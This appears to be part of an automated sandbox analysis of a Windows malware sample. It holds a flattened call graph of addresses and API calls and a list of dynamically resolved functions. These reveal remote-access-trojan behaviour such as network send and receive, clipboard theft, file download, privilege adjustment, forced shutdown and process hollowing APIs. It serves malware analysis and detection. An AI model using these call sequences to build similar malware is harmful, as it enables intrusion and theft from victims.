42c8db __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 41236->41238 41239 435983 41237->41239 41240 40df7b 41238->41240 41244 436265 50 API calls 3 library calls 41239->41244 41240->40274 41242 435db0 swprintf 20 API calls 41242->41236 41243 43598e 41243->41242 41244->41243 41246 43785b 41245->41246 41247 434256 __dosmaperr 20 API calls 41246->41247 41248 437892 __cftof 41246->41248 41247->41248 41248->40931 41250 40d000 RegQueryValueExA RegCloseKey 41249->41250 41251 40d02d 41249->41251 41250->41251 41251->40938 41253 402159 41252->41253 41254 402261 11 API calls 41253->41254 41255 402164 41254->41255 41262 402347 41255->41262 41257 402171 41257->40975 41259 4194e5 41258->41259 41260 40198d SetEvent 41258->41260 41259->41260 41270 4193aa 41259->41270 41260->40982 41263 402381 41262->41263 41264 402353 41262->41264 41269 4026de 22 API calls 41263->41269 41265 402723 28 API calls 41264->41265 41268 40235d 41265->41268 41268->41257 41271 4193d5 41270->41271 41272 4193b8 41270->41272 41271->41260 41272->41271 41277 4193fc 41272->41277 41289 42bb1c EnterCriticalSection 41272->41289 41275 4193e5 41275->41271 41290 42bb26 LeaveCriticalSection 41275->41290 41277->41271 41278 418551 41277->41278 41279 41856c pre_c_initialization 41278->41279 41280 4185d6 41279->41280 41281 4185b0 41279->41281 41291 419374 57 API calls 41279->41291 41280->41271 41281->41280 41285 4185cc 41281->41285 41292 416e98 41281->41292 41285->41280 41288 416e98 2 API calls 41285->41288 41296 4170f6 21 API calls 41285->41296 41297 418529 21 API calls 41285->41297 41298 41d053 21 API calls ctype 41285->41298 41288->41285 41289->41275 41290->41277 41291->41281 41293 416ea6 41292->41293 41294 416ead 41292->41294 41293->41285 41294->41293 41299 41ee06 41294->41299 41296->41285 41297->41285 41298->41285 41304 41ee86 send 41299->41304 41306 4019f3 recv 41305->41306 41307 4019c8 WaitForSingleObject 41305->41307 41309 401a04 41306->41309 41324 419516 41307->41324 41309->40995 41312 4021c9 11 API calls 41311->41312 41316 401b0d 41312->41316 41313 401c3e 41314 402091 11 API calls 41313->41314 41315 401c46 41314->41315 41315->40995 41316->41313 41317 402091 11 API calls 41316->41317 41318 4021e0 28 API calls 41316->41318 41319 402077 28 API calls 41316->41319 41321 402006 28 API calls 41316->41321 41322 40209b 28 API calls 41316->41322 41317->41316 41318->41316 41320 401bd6 CreateEventA CreateThread WaitForSingleObject CloseHandle 41319->41320 41320->41316 41378 40f4a7 41320->41378 41321->41316 41322->41316 41323->41000 41325 419521 41324->41325 41326 4019e2 SetEvent 41324->41326 41325->41326 41328 4194be 41325->41328 41326->41309 41331 419438 41328->41331 41332 419445 41331->41332 41336 419462 41331->41336 41332->41336 41337 4186e1 41332->41337 41334 419477 41334->41336 41343 4192fb EnterCriticalSection 41334->41343 41336->41326 41338 4186fa 41337->41338 41339 41871f 41338->41339 41342 41873f ctype 41338->41342 41358 419374 57 API calls 41338->41358 41339->41342 41344 417fef 41339->41344 41342->41334 41343->41336 41349 418009 41344->41349 41346 417ef7 23 API calls 41346->41349 41347 41848e 41375 4187b2 24 API calls 41347->41375 41349->41346 41349->41347 41350 418487 41349->41350 41351 4184cb 41349->41351 41356 41805c 41349->41356 41359 41e9ee 41349->41359 41372 417120 24 API calls 41349->41372 41373 41cf75 24 API calls 41349->41373 41374 417dd1 24 API calls 41349->41374 41377 4187b2 24 API calls 41350->41377 41376 4187b2 24 API calls 41351->41376 41356->41339 41358->41339 41360 41ea58 41359->41360 41361 41ea0b 41359->41361 41364 41eb15 ctype 41360->41364 41365 41ea73 41360->41365 41362 41ea27 41361->41362 41363 41ea3c 41361->41363 41366 4187b2 24 API calls 41362->41366 41367 41e757 53 API calls 41363->41367 41368 41e757 53 API calls 41364->41368 41371 41ea31 ctype 41364->41371 41365->41363 41369 41eaa7 41365->41369 41365->41371 41366->41371 41367->41371 41368->41371 41370 42a8be 21 API calls 41369->41370 41370->41371 41371->41349 41372->41349 41373->41349 41374->41349 41375->41356 41376->41356 41377->41356 41379 4021e0 28 API calls 41378->41379 41380 40f4c6 SetEvent 41379->41380 41381 40f4db 41380->41381 41382 402006 28 API calls 41381->41382 41383 40f4f5 41382->41383 41384 4021e0 28 API calls 41383->41384 41385 40f505 41384->41385 41386 4021e0 28 API calls 41385->41386 41387 40f517 41386->41387 41388 414384 28 API calls 41387->41388 41389 40f520 41388->41389 41390 40f52c 41389->41390 41391 40fa1e 41389->41391 41394 40f532 41390->41394 41395 40fa07 41390->41395 41392 410113 41391->41392 41393 40fa27 41391->41393 41396 410120 41392->41396 41397 41042e 41392->41397 41399 40ff89 41393->41399 41400 40fa2d 41393->41400 41407 40f543 GetTickCount 41394->41407 41561 40f689 41394->41561 41781 40f6b9 41394->41781 41398 40fa14 41395->41398 41395->41561 41404 4103e1 41396->41404 41405 410126 41396->41405 41401 4105a9 41397->41401 41408 410443 41397->41408 41824 408649 CreateThread 41398->41824 41403 4034cf 22 API calls 41399->41403 41415 40fa60 ExitProcess 41400->41415 41416 40fa70 41400->41416 41417 40fb71 41400->41417 41418 40fa42 41400->41418 41419 40fda4 OpenClipboard 41400->41419 41420 40fb15 41400->41420 41421 40fe06 41400->41421 41422 40fd89 OpenClipboard 41400->41422 41423 40fd0a OpenClipboard 41400->41423 41424 40fa7d 41400->41424 41425 40fa8f 41400->41425 41400->41561 41702 40fbf5 41400->41702 41462 4034cf 22 API calls 41401->41462 41402 4034fa 11 API calls 41409 4105da 41402->41409 41410 40ff94 41403->41410 41413 4103ea 41404->41413 41414 41040f ShowWindow SetForegroundWindow 41404->41414 41411 410381 41405->41411 41412 410131 41405->41412 41426 414155 28 API calls 41407->41426 41444 410541 41408->41444 41445 41044c 41408->41445 41428 402091 11 API calls 41409->41428 41429 4034cf 22 API calls 41410->41429 41447 4103c4 41411->41447 41448 410389 41411->41448 41434 410137 41412->41434 41435 41032a 41412->41435 41439 415128 87 API calls 41413->41439 41414->41561 41430 40fa68 Sleep 41416->41430 41431 40fa78 41416->41431 41440 4034cf 22 API calls 41417->41440 41450 4034cf 22 API calls 41418->41450 41441 40fdb3 GetClipboardData GlobalLock GlobalUnlock CloseClipboard 41419->41441 41419->41561 41829 40153a 14 API calls 41420->41829 41446 4034cf 22 API calls 41421->41446 41438 40fd98 EmptyClipboard 41422->41438 41422->41561 41449 40fd19 EmptyClipboard 41423->41449 41423->41561 41825 408de1 51 API calls 41424->41825 41436 40fa87 Sleep 41425->41436 41437 40fa97 41425->41437 41442 40f554 41426->41442 41465 4105e6 41428->41465 41453 40ffa0 41429->41453 41430->41416 41854 408817 54 API calls ___scrt_fastfail 41431->41854 41455 410231 41434->41455 41456 410143 41434->41456 41466 4034cf 22 API calls 41435->41466 41436->41425 41468 4034cf 22 API calls 41437->41468 41469 40fd9e CloseClipboard 41438->41469 41457 4103f1 CreateThread 41439->41457 41458 40fb7c 41440->41458 41470 403509 28 API calls 41441->41470 41459 4140ad GetTickCount 41442->41459 41851 406030 14 API calls 41444->41851 41460 410455 41445->41460 41461 410504 41445->41461 41471 40fe12 41446->41471 41454 4034cf 22 API calls 41447->41454 41472 4103a1 41448->41472 41473 41038e 41448->41473 41463 4034cf 22 API calls 41449->41463 41464 40fa4d 41450->41464 41451 40fb23 41474 40170e 100 API calls 41451->41474 41476 4034cf 22 API calls 41453->41476 41477 4103cf 41454->41477 41840 41069b 14 API calls 41455->41840 41478 41020c 41456->41478 41479 41014c 41456->41479 41457->41561 41517 433426 39 API calls 41458->41517 41480 40f560 41459->41480 41481 4104df 41460->41481 41482 41045e 41460->41482 41491 4034cf 22 API calls 41461->41491 41483 4105bc 41462->41483 41484 40fd29 41463->41484 41502 40fa54 DeleteFileW 41464->41502 41485 402091 11 API calls 41465->41485 41486 410336 41466->41486 41467 40fc02 41488 4034cf 22 API calls 41467->41488 41489 40faa3 41468->41489 41469->41419 41490 40fde7 41470->41490 41523 4034cf 22 API calls 41471->41523 41493 4034cf 22 API calls 41472->41493 41473->41561 41845 413544 317 API calls 41473->41845 41494 40fb30 41474->41494 41475 41054d 41495 4034cf 22 API calls 41475->41495 41496 40ffac 41476->41496 41497 4021e0 28 API calls 41477->41497 41507 4034cf 22 API calls 41478->41507 41498 410193 41479->41498 41529 4034cf 22 API calls 41479->41529 41479->41561 41499 414155 28 API calls 41480->41499 41506 4034cf 22 API calls 41481->41506 41500 410463 41482->41500 41501 4104ba 41482->41501 41534 433426 39 API calls 41483->41534 41520 40fd30 GlobalAlloc GlobalLock 41484->41520 41503 4105f2 41485->41503 41536 410362 41486->41536 41537 41034b 41486->41537 41505 40fc0e 41488->41505 41538 4034cf 22 API calls 41489->41538 41508 4142e7 28 API calls 41490->41508 41509 410511 41491->41509 41512 4103ac 41493->41512 41514 402178 28 API calls 41494->41514 41515 410558 41495->41515 41543 4034cf 22 API calls 41496->41543 41516 4103da 41497->41516 41519 4034cf 22 API calls 41498->41519 41518 40f56b 41499->41518 41532 401673 3 API calls 41500->41532 41500->41561 41521 4034cf 22 API calls 41501->41521 41502->41561 41551 40fc23 41505->41551 41552 40fc39 41505->41552 41555 4104ea 41506->41555 41556 410217 41507->41556 41522 40fdf5 41508->41522 41558 402178 28 API calls 41509->41558 41510 41023d 41524 4034cf 22 API calls 41510->41524 41513 4021e0 28 API calls 41512->41513 41525 4103b7 41513->41525 41526 40fb3f 41514->41526 41527 4021e0 28 API calls 41515->41527 41847 410870 129 API calls 41516->41847 41530 40fb89 41517->41530 41531 41405d 30 API calls 41518->41531 41533 41019e 41519->41533 41535 4034cf 22 API calls 41520->41535 41549 4104c5 41521->41549 41539 4018e7 64 API calls 41522->41539 41559 40fe25 41523->41559 41560 410248 41524->41560 41846 404fd2 317 API calls 41525->41846 41541 4018e7 64 API calls 41526->41541 41542 410563 41527->41542 41565 410167 41529->41565 41544 4034cf 22 API calls 41530->41544 41545 40f579 41531->41545 41546 410478 41532->41546 41569 4101a5 StrToIntA 41533->41569 41547 4105c9 ShowWindow 41534->41547 41548 40fd54 41535->41548 41553 4034cf 22 API calls 41536->41553 41550 4034cf 22 API calls 41537->41550 41554 40fab7 41538->41554 41557 40fe01 41539->41557 41562 40fb4d 41541->41562 41563 4034cf 22 API calls 41542->41563 41564 40ffbf 41543->41564 41566 40fb9b 41544->41566 41567 4142e7 28 API calls 41545->41567 41568 40170e 100 API calls 41546->41568 41547->41561 41598 4034cf 22 API calls 41548->41598 41583 433426 39 API calls 41549->41583 41570 410350 41550->41570 41571 4034cf 22 API calls 41551->41571 41573 4034cf 22 API calls 41552->41573 41572 410367 41553->41572 41826 40900f 31 API calls 41554->41826 41574 433426 39 API calls 41555->41574 41575 433426 39 API calls 41556->41575 41601 4034ff 11 API calls 41557->41601 41576 410523 41558->41576 41832 40cb60 37 API calls 41559->41832 41577 433426 39 API calls 41560->41577 41561->41402 41578 401a3c 286 API calls 41562->41578 41579 41056e 41563->41579 41609 4034cf 22 API calls 41564->41609 41594 4034cf 22 API calls 41565->41594 41611 4034cf 22 API calls 41566->41611 41580 40f587 41567->41580 41581 410480 41568->41581 41582 4034cf 22 API calls 41569->41582 41584 4021e0 28 API calls 41570->41584 41585 40fc2a 41571->41585 41586 4021e0 28 API calls 41572->41586 41587 40fc3e 41573->41587 41588 4104f7 41574->41588 41589 410224 41575->41589 41605 40d202 14 API calls 41576->41605 41591 410255 41577->41591 41592 40fb60 41578->41592 41593 4021e0 28 API calls 41579->41593 41595 4034cf 22 API calls 41580->41595 41596 4034cf 22 API calls 41581->41596 41597 4101b9 41582->41597 41599 4104d2 41583->41599 41600 41035b 41584->41600 41622 433426 39 API calls 41585->41622 41586->41600 41624 40fc53 41587->41624 41625 40fc6c 41587->41625 41850 4140d0 OpenProcess CloseHandle 41588->41850 41839 407a60 22 API calls 41589->41839 41841 410d80 28 API calls 41591->41841 41830 401d0d 98 API calls 41592->41830 41608 410579 41593->41608 41610 410179 41594->41610 41612 40f595 41595->41612 41613 41048c 41596->41613 41836 40900f 31 API calls 41597->41836 41642 40fd66 ctype 41598->41642 41849 4140fc OpenProcess CloseHandle 41599->41849 41844 4106ac 125 API calls 41600->41844 41601->41561 41605->41561 41617 4034cf 22 API calls 41608->41617 41618 40ffd4 41609->41618 41637 433426 39 API calls 41610->41637 41619 40fbaf 41611->41619 41620 4047c1 28 API calls 41612->41620 41621 4021e0 28 API calls 41613->41621 41615 40faca 41644 4034cf 22 API calls 41615->41644 41616 41026f 41646 4034cf 22 API calls 41616->41646 41627 410584 41617->41627 41833 40d8ed 53 API calls 41618->41833 41638 40fbb6 MessageBoxW 41619->41638 41629 40f5a3 41620->41629 41630 410497 41621->41630 41632 40fc37 ExitWindowsEx 41622->41632 41633 4034cf 22 API calls 41624->41633 41626 4034cf 22 API calls 41625->41626 41634 40fc71 41626->41634 41635 4021e0 28 API calls 41627->41635 41790 406ae8 41629->41790 41640 4018e7 64 API calls 41630->41640 41632->41561 41645 40fc5a 41633->41645 41661 40fc81 41634->41661 41662 40fcaa LoadLibraryA GetProcAddress 41634->41662 41647 41058f 41635->41647 41636 40ffdd 41648 4034cf 22 API calls 41636->41648 41649 410186 SetWindowTextW 41637->41649 41650 4034cf 22 API calls 41638->41650 41652 4104a3 41640->41652 41641 4101cc 41668 4034cf 22 API calls 41641->41668 41653 40fd74 GlobalUnlock SetClipboardData 41642->41653 41654 40fae2 41644->41654 41670 433426 39 API calls 41645->41670 41655 410282 41646->41655 41852 404993 317 API calls 41647->41852 41657 40ffed 41648->41657 41649->41498 41658 40fbca 41650->41658 41848 40400d 81 API calls 41652->41848 41653->41469 41669 40fae9 URLDownloadToFileW 41654->41669 41663 4021e0 28 API calls 41655->41663 41682 403509 28 API calls 41657->41682 41665 414155 28 API calls 41658->41665 41659 404779 28 API calls 41666 40f5c1 41659->41666 41671 4034cf 22 API calls 41661->41671 41673 4034cf 22 API calls 41662->41673 41672 41028d 41663->41672 41664 41059b 41853 40603e 98 API calls 41664->41853 41675 40fbe0 41665->41675 41676 406ae8 28 API calls 41666->41676 41667 4104a8 41677 401a3c 286 API calls 41667->41677 41678 4101e3 41668->41678 41669->41557 41679 40faf9 41669->41679 41670->41632 41680 40fc8d 41671->41680 41681 4034cf 22 API calls 41672->41681 41700 40fccd 41673->41700 41683 404779 28 API calls 41675->41683 41684 40f5d0 41676->41684 41677->41561 41837 414a52 CreateFileW WriteFile CloseHandle 41678->41837 41827 40659e 28 API calls 41679->41827 41698 433426 39 API calls 41680->41698 41687 410298 41681->41687 41688 410001 41682->41688 41689 40fbeb 41683->41689 41690 404779 28 API calls 41684->41690 41693 4021e0 28 API calls 41687->41693 41694 4034cf 22 API calls 41688->41694 41695 404779 28 API calls 41689->41695 41696 40f5dc 41690->41696 41691 4101ec 41838 414d7f 32 API calls 41691->41838 41692 40fb08 41828 408ad8 40 API calls 41692->41828 41699 4102a3 41693->41699 41701 410013 41694->41701 41695->41702 41703 406ae8 28 API calls 41696->41703 41698->41632 41705 4034cf 22 API calls 41699->41705 41706 4034cf 22 API calls 41700->41706 41710 40f6c1 41700->41710 41712 403509 28 API calls 41701->41712 41831 410d25 GetCurrentProcess OpenProcessToken LookupPrivilegeValueA AdjustTokenPrivileges GetLastError 41702->41831 41707 40f5e6 41703->41707 41704 40fb0d 41704->41557 41709 4102ae 41705->41709 41706->41710 41711 4018e7 64 API calls 41707->41711 41716 403509 28 API calls 41709->41716 41710->41561 41713 40f5f5 41711->41713 41714 410027 41712->41714 41715 402091 11 API calls 41713->41715 41717 4034cf 22 API calls 41714->41717 41718 40f5fe 41715->41718 41719 4102c0 41716->41719 41720 410033 41717->41720 41721 402091 11 API calls 41718->41721 41722 4034cf 22 API calls 41719->41722 41723 414225 28 API calls 41720->41723 41724 40f60a 41721->41724 41725 4102cb 41722->41725 41726 410041 41723->41726 41727 402091 11 API calls 41724->41727 41732 403509 28 API calls 41725->41732 41728 407d1f 28 API calls 41726->41728 41729 40f616 41727->41729 41730 41004f 41728->41730 41731 402091 11 API calls 41729->41731 41834 4093b6 28 API calls 41730->41834 41734 40f622 41731->41734 41735 4102dd 41732->41735 41737 402091 11 API calls 41734->41737 41842 4072e5 130 API calls 2 library calls 41735->41842 41736 41005b 41739 407d1f 28 API calls 41736->41739 41740 40f62e 41737->41740 41741 410067 41739->41741 41742 402091 11 API calls 41740->41742 41835 4093b6 28 API calls 41741->41835 41744 40f63a 41742->41744 41747 4034ff 11 API calls 41744->41747 41746 410073 41749 4034ff 11 API calls 41746->41749 41748 4102e9 41843 407abb 98 API calls 41748->41843 41751 41007d 41749->41751 41753 4034ff 11 API calls 41751->41753 41755 410086 41753->41755 41757 4034ff 11 API calls 41755->41757 41759 410092 41757->41759 41761 4034ff 11 API calls 41759->41761 41763 41009e 41761->41763 41764 4034ff 11 API calls 41763->41764 41765 4100aa 41764->41765 41768 4034ff 11 API calls 41765->41768 41823 401eff 83 API calls 41781->41823 41795 406afb 41790->41795 41791 406b3c 41792 40205b 28 API calls 41791->41792 41793 406b3a 41792->41793 41794 40210e 11 API calls 41793->41794 41796 406b54 41794->41796 41795->41791 41797 406b31 41795->41797 41796->41659 41855 404828 28 API calls 41797->41855 41823->41710 41824->41710 41856 4084f3 134 API calls 41824->41856 41825->41710 41826->41615 41827->41692 41828->41704 41829->41451 41831->41467 41832->41561 41833->41636 41834->41736 41835->41746 41836->41641 41837->41691 41838->41557 41839->41561 41840->41510 41841->41616 41842->41748 41843->41710 41844->41561 41845->41561 41846->41561 41847->41710 41848->41667 41849->41710 41850->41710 41851->41475 41852->41664 41853->41561 41855->41793 41888 415a14 41857->41888 41860 4159fe GetMessageA 41861 4159ea TranslateMessage DispatchMessageA 41860->41861 41862 415a0f 41860->41862 41861->41860 41865 40a6db 41863->41865 41864 40cfd6 3 API calls 41864->41865 41865->41864 41866 40a776 41865->41866 41869 40a766 Sleep 41865->41869 41870 40a70d 41865->41870 41868 403509 28 API calls 41866->41868 41867 403509 28 API calls 41867->41870 41872 40a781 41868->41872 41869->41865 41870->41867 41870->41869 41871 414225 28 API calls 41870->41871 41878 4034ff 11 API calls 41870->41878 41881 402178 28 API calls 41870->41881 41885 40d202 14 API calls 41870->41885 41894 408817 54 API calls ___scrt_fastfail 41870->41894 41895 40d2a7 14 API calls 41870->41895 41871->41870 41874 414225 28 API calls 41872->41874 41875 40a78d 41874->41875 41896 40d2a7 14 API calls 41875->41896 41878->41870 41879 40a79b 41880 4034ff 11 API calls 41879->41880 41882 40a7a7 41880->41882 41881->41870 41883 402178 28 API calls 41882->41883 41884 40a7b4 41883->41884 41886 40d202 14 API calls 41884->41886 41885->41870 41887 40a7c7 ExitProcess 41886->41887 41889 42ec70 ___scrt_fastfail 41888->41889 41890 415a2b RegisterClassExA 41889->41890 41891 415986 ExtractIconA lstrcpynA Shell_NotifyIconA 41890->41891 41892 415a6b CreateWindowExA 41890->41892 41891->41860 41892->41891 41893 415a85 GetLastError 41892->41893 41893->41891 41895->41870 41896->41879 42101 41eb9f 42102 41ebb4 42101->42102 42117 41ec46 42101->42117 42103 41ebc2 42102->42103 42104 416e98 2 API calls 42102->42104 42105 41ec76 42103->42105 42106 41ecd6 42103->42106 42107 41ec01 42103->42107 42108 41ecfd 42103->42108 42110 41ecab 42103->42110 42115 41ec36 42103->42115 42103->42117 42119 41d1b3 42103->42119 42104->42103 42105->42110 42113 417fef 55 API calls 42105->42113 42105->42117 42106->42108 42106->42117 42137 41dd6f 42106->42137 42112 417fef 55 API calls 42107->42112 42107->42115 42107->42117 42108->42117 42151 41e339 42108->42151 42110->42106 42129 41d99c 42110->42129 42112->42107 42113->42105 42115->42105 42115->42117 42118 41d1b3 50 API calls 42115->42118 42118->42105 42120 41d1c5 42119->42120 42121 41d1cf 42119->42121 42120->42107 42164 41bc23 42121->42164 42123 41d1f2 42123->42120 42178 4170f6 21 API calls 42123->42178 42125 41d221 42125->42120 42127 41d272 ctype 42125->42127 42179 42af36 42125->42179 42127->42120 42128 416e98 2 API calls 42127->42128 42128->42120 42130 41d9e4 42129->42130 42132 41d9cb 42129->42132 42131 41d9ee 42130->42131 42130->42132 42336 4232bc 21 API calls ___scrt_fastfail 42130->42336 42131->42106 42132->42131 42136 416e98 2 API calls 42132->42136 42337 4170f6 21 API calls 42132->42337 42338 41d053 21 API calls ctype 42132->42338 42136->42132 42138 41dd9e 42137->42138 42142 41dd97 42137->42142 42339 4170f6 21 API calls 42138->42339 42140 41ddad 42140->42142 42340 418a45 45 API calls 42140->42340 42142->42108 42143 41ddf6 42143->42142 42144 42a8be 21 API calls 42143->42144 42145 41de60 42144->42145 42145->42142 42147 41df01 42145->42147 42341 415f67 48 API calls 42145->42341 42147->42142 42342 41d053 21 API calls ctype 42147->42342 42149 41df6a 42149->42142 42150 416e98 2 API calls 42149->42150 42150->42142 42343 4170f6 21 API calls 42151->42343 42153 41e3db 42153->42117 42154 41e354 42154->42153 42344 41d053 21 API calls ctype 42154->42344 42156 41e3d2 42156->42153 42161 41e43a 42156->42161 42345 419e45 QueryPerformanceFrequency QueryPerformanceCounter EnterCriticalSection LeaveCriticalSection ctype 42156->42345 42158 41e471 42158->42153 42162 41e494 42158->42162 42347 418f45 24 API calls 42158->42347 42160 416e98 2 API calls 42160->42153 42161->42153 42161->42158 42346 418f45 24 API calls 42161->42346 42162->42153 42162->42160 42166 41bc36 42164->42166 42169 41bc60 42164->42169 42165 41bcb3 42177 41bd2a 42165->42177 42183 41ac0a 42165->42183 42166->42169 42201 41bb34 21 API calls 42166->42201 42169->42165 42169->42177 42202 41a600 21 API calls 42169->42202 42170 41bcc9 42170->42177 42188 41a8ce 42170->42188 42173 41bcee 42175 41bd08 42173->42175 42173->42177 42203 41ace4 21 API calls 42173->42203 42175->42177 42193 41b67b 42175->42193 42177->42123 42178->42125 42180 42af66 42179->42180 42181 42af4b 42179->42181 42180->42127 42181->42180 42182 42b1e6 3 API calls 42181->42182 42182->42180 42184 41ac14 42183->42184 42185 41ac0e 42183->42185 42204 41a21d 21 API calls 42184->42204 42185->42170 42187 41ac1e 42187->42170 42189 41a8e3 42188->42189 42190 41a8d2 42188->42190 42189->42173 42190->42189 42205 41a21d 21 API calls 42190->42205 42192 41a8e0 42192->42173 42194 41b698 42193->42194 42196 41b6a5 42194->42196 42214 41a21d 21 API calls 42194->42214 42198 41b6f2 42196->42198 42199 41b6bd 42196->42199 42215 41b639 21 API calls 42196->42215 42198->42199 42206 41af31 42198->42206 42199->42177 42201->42169 42202->42165 42203->42175 42204->42187 42205->42192 42207 41af3c 42206->42207 42210 41af43 42206->42210 42226 41acfb 23 API calls 2 library calls 42207->42226 42209 41af48 42209->42199 42210->42209 42216 41ae27 42210->42216 42211 41af41 42211->42199 42213 41af60 42213->42199 42214->42196 42215->42198 42217 41ae44 42216->42217 42218 42a8be 21 API calls 42217->42218 42224 41ae4e 42217->42224 42219 41ae9b 42218->42219 42219->42224 42227 4259c1 42219->42227 42221 41aed0 42222 42a8be 21 API calls 42221->42222 42221->42224 42223 41aedf 42222->42223 42223->42224 42235 4268af 23 API calls 2 library calls 42223->42235 42224->42213 42226->42211 42228 4259fb 42227->42228 42231 425a69 42227->42231 42228->42231 42236 423fff 42228->42236 42230 425a36 42230->42231 42248 4257ab 42230->42248 42231->42221 42233 425a54 42233->42231 42255 42581d 42233->42255 42235->42224 42238 424013 42236->42238 42246 4240c0 42236->42246 42237 42404c 42240 424069 42237->42240 42272 423fbb 44 API calls 42237->42272 42238->42237 42238->42246 42271 423fbb 44 API calls 42238->42271 42241 424086 42240->42241 42273 423fbb 44 API calls 42240->42273 42244 4240a3 42241->42244 42274 423fbb 44 API calls 42241->42274 42244->42246 42275 423fbb 44 API calls 42244->42275 42246->42230 42249 42af36 3 API calls 42248->42249 42250 4257bf 42249->42250 42251 4257f5 42250->42251 42276 42776a 42250->42276 42251->42233 42253 4257d4 42253->42251 42282 42821c 23 API calls 42253->42282 42256 42585c 42255->42256 42260 425852 42255->42260 42257 423fff 44 API calls 42256->42257 42258 425869 42256->42258 42257->42258 42258->42260 42292 42542c 42258->42292 42260->42231 42261 4258db 42261->42260 42295 42742d 42261->42295 42264 42742d 22 API calls 42265 42590a 42264->42265 42265->42260 42299 4281e9 42265->42299 42269 425950 42269->42260 42327 4249f7 23 API calls 42269->42327 42271->42237 42272->42240 42273->42241 42274->42244 42275->42246 42277 427780 42276->42277 42278 42777b 42276->42278 42280 4277b1 42277->42280 42287 4277bd 22 API calls 42277->42287 42283 42749d 42278->42283 42280->42253 42282->42251 42284 4274a8 42283->42284 42285 4274bc 42284->42285 42288 42a8e8 42284->42288 42285->42277 42287->42277 42289 42a8f3 42288->42289 42290 42a8f7 42288->42290 42289->42285 42291 434b86 22 API calls 42290->42291 42291->42289 42293 42a8be 21 API calls 42292->42293 42294 425435 ___scrt_fastfail 42293->42294 42294->42261 42296 427437 42295->42296 42298 4258f6 42295->42298 42297 42749d 22 API calls 42296->42297 42296->42298 42297->42298 42298->42260 42298->42264 42300 4281f4 42299->42300 42301 42749d 22 API calls 42300->42301 42302 42592f 42301->42302 42302->42260 42303 4251f6 42302->42303 42305 42520f 42303->42305 42309 4252a6 42303->42309 42304 42542c 21 API calls 42304->42305 42305->42304 42306 425252 42305->42306 42305->42309 42307 42542c 21 API calls 42306->42307 42308 425257 42307->42308 42308->42309 42328 425134 23 API calls 42308->42328 42309->42269 42311 42526f 42311->42309 42329 428537 22 API calls 42311->42329 42313 4252ec 42314 42742d 22 API calls 42313->42314 42315 425343 42313->42315 42319 4252fe 42314->42319 42315->42309 42331 424c6b 26 API calls 42315->42331 42317 425371 42317->42309 42332 42a628 22 API calls 42317->42332 42319->42315 42330 428537 22 API calls 42319->42330 42321 425389 42321->42309 42333 42bb50 22 API calls 42321->42333 42323 4253c1 42323->42309 42334 42bb50 22 API calls 42323->42334 42325 4253da 42325->42309 42335 42bb50 22 API calls 42325->42335 42327->42260 42328->42311 42329->42313 42330->42315 42331->42317 42332->42321 42333->42323 42334->42325 42335->42309 42336->42132 42337->42132 42338->42132 42339->42140 42340->42143 42341->42147 42342->42149 42343->42154 42344->42156 42345->42161 42346->42158 42347->42162

                                                                                              Executed Functions

                                                                                              Function 00414EED Relevance: 148.9, APIs: 52, Strings: 33, Instructions: 164libraryloaderCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(Psapi,GetProcessImageFileNameW,?,?,?,0040A1F2), ref: 00414F00
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00414F09
                                                                                              • GetModuleHandleA.KERNEL32(Kernel32,GetProcessImageFileNameW,?,?,?,0040A1F2), ref: 00414F24
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00414F27
                                                                                              • LoadLibraryA.KERNEL32(shcore,SetProcessDpiAwareness,?,?,?,0040A1F2), ref: 00414F38
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00414F3B
                                                                                              • LoadLibraryA.KERNEL32(user32,SetProcessDpiAwareness,?,?,?,0040A1F2), ref: 00414F50
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00414F53
                                                                                              • LoadLibraryA.KERNEL32(ntdll,NtUnmapViewOfSection,?,?,?,0040A1F2), ref: 00414F64
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00414F67
                                                                                              • LoadLibraryA.KERNEL32(kernel32,GlobalMemoryStatusEx,?,?,?,0040A1F2), ref: 00414F73
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00414F76
                                                                                              • GetModuleHandleA.KERNEL32(kernel32,IsWow64Process,?,?,?,0040A1F2), ref: 00414F87
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00414F8A
                                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetComputerNameExW,?,?,?,0040A1F2), ref: 00414F9B
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00414F9E
                                                                                              • LoadLibraryA.KERNEL32(Shell32,IsUserAnAdmin,?,?,?,0040A1F2), ref: 00414FAF
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00414FB2
                                                                                              • GetModuleHandleA.KERNEL32(kernel32,SetProcessDEPPolicy,?,?,?,0040A1F2), ref: 00414FC3
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00414FC6
                                                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayDevicesW,?,?,?,0040A1F2), ref: 00414FD7
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00414FDA
                                                                                              • GetModuleHandleA.KERNEL32(user32,EnumDisplayMonitors,?,?,?,0040A1F2), ref: 00414FEB
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00414FEE
                                                                                              • GetModuleHandleA.KERNEL32(user32,GetMonitorInfoW,?,?,?,0040A1F2), ref: 00414FFF
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00415002
                                                                                              • GetModuleHandleA.KERNEL32(kernel32,GetSystemTimes,?,?,?,0040A1F2), ref: 00415013
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00415016
                                                                                              • LoadLibraryA.KERNEL32(Shlwapi,0000000C,?,?,?,0040A1F2), ref: 00415024
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 00415027
                                                                                              • LoadLibraryA.KERNEL32(kernel32,GetConsoleWindow,?,?,?,0040A1F2), ref: 00415038
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041503B
                                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtSuspendProcess,?,?,?,0040A1F2), ref: 0041504C
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 0041504F
                                                                                              • GetModuleHandleA.KERNEL32(ntdll,NtResumeProcess,?,?,?,0040A1F2), ref: 00415060
